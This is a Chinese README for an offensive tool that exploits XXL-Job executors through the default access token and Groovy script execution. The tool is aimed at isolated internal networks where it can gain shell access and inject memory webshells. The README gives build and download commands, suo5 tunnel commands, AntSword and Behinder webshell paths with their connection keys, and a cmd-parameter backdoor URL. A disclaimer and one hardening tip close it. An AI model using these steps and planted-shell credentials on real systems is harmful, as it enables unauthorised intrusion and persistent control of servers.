一个专门针对XXL-Job执行器的综合漏洞利用工具,特别设计用于不出网环境和无任务调度中心的场景。支持漏洞验证、命令执行、多种内存马注入等功能。
- 🎯 专注执行器利用 - 直接攻击XXL-Job执行器,无需访问调度中心
- 🔒 不出网场景优化 - 专为内网隔离环境设计的利用方式
- 🚀 一键自动化 - 图形化界面,支持一键漏洞检测和利用
- 🔧 多种利用方式 - 支持命令执行、内存马注入、信息收集
- 🌐 跨平台支持 - Windows、Linux、macOS 全平台支持
- 🔗 代理链支持 - HTTP/SOCKS5 代理支持,适应复杂网络环境
- ✅ 发现XXL-Job执行器端口(通常为9999),但无法找到调度中心
- ✅ 目标系统处于内网环境,无法出网通信
- ✅ 需要在隔离环境中进行漏洞验证和利用
- ✅ 渗透测试中需要快速获取系统控制权限
- ❌ 执行器端口未开放或不可访问
- ❌ 执行器已修改默认Access Token
- ❌ 需要依赖调度中心进行任务管理的场景
- Go 1.19+ (仅编译时需要)
- 或直接下载预编译二进制文件
# 从 Releases 页面下载对应平台的二进制文件
wget https://github.com/qncosfh/xxl_job_executor_exploit/releases/latest/download/xxl_job_executor_exploit_windows_amd64.exe
wget https://github.com/qncosfh/xxl_job_executor_exploit/releases/latest/download/xxl_job_executor_exploit_mac_arm64git clone https://github.com/qncosfh/xxl_job_executor_exploit.git
cd xxl_job_executor_exploit
go mod tidy
go build -o xxl_job_exploit main.go- 启动工具
./xxl_job_exploit-
配置目标
- 输入XXL-Job执行器地址 (例如:
http://192.168.1.100:9999) - 可选:配置HTTP/SOCKS5代理
- 输入XXL-Job执行器地址 (例如:
-
漏洞验证
- 点击"漏洞验证"按钮
- 工具将自动检测版本并验证漏洞
-
选择利用方式
- 命令执行:使用Shell终端进行交互
- 内存马注入:选择合适的内存马类型
- 信息收集:获取系统详细信息
- 自动检测XXL-Job版本 (2.2.0 / >2.2.0)
- 验证默认Token可用性
- 识别操作系统类型 (Windows/Linux)
- 交互式Shell终端
- 跨平台命令执行支持
- 智能结果解析和显示
- 命令历史和输出管理
连接方式:
2.2.0版本: ./suo5 -t http://target:port/suo5diao2.2 -H "Referer: Igoxoomgb"
>2.2.0版本: ./suo5 -t http://target:port/suo5diao2.3 -H "Referer: Igoxoomgb"
连接地址: http://target:port/antsword
连接密钥: Nazkkdgde
请求头: Referer: Niykzlij
连接地址: http://target:port/rebeyond
连接密钥: e45e329feb5d925b
连接地址: http://target:port/A_llen666?cmd=whoami
参数: cmd (直接传入要执行的命令)
- HTTP代理支持
- SOCKS5代理支持
- 自定义超时设置
XXL-Job执行器在默认配置下存在以下安全问题:
- 默认Access Token: 使用固定的
default_token - Groovy代码执行: 允许执行任意Groovy脚本
- 权限控制缺失: 未对代码执行进行有效限制
工具自动适配不同版本的XXL-Job:
| 版本 | 接口类 | 方法签名 | 日志输出 |
|---|---|---|---|
| 2.2.0 | IJobHandler | public ReturnT<String> execute(String param) |
XxlJobLogger.log() |
| >2.2.0 | IJobHandler | void execute() |
XxlJobHelper.log() |
xxl_job_executor_exploit/
├── main.go # 程序入口
├── gui/ # GUI界面模块
│ └── main_window.go # 主窗口实现
├── exploits/ # 漏洞利用模块
│ └── xxljob.go # 核心利用逻辑
├── models/ # 数据模型
│ └── models.go # 请求响应结构体
├── go.mod # Go模块依赖
├── go.sum # 依赖校验文件
└── README.md # 项目说明
- 本工具仅用于授权的安全测试和研究目的
- 请勿在未经授权的系统上使用
- 使用者需承担相应的法律责任
- 作者不对任何滥用行为负责
针对XXL-Job执行器的安全加固建议:
修改默认配置
# application.properties
xxl.job.accessToken=your_custom_strong_token_here免责声明: 本工具仅供安全研究和授权测试使用。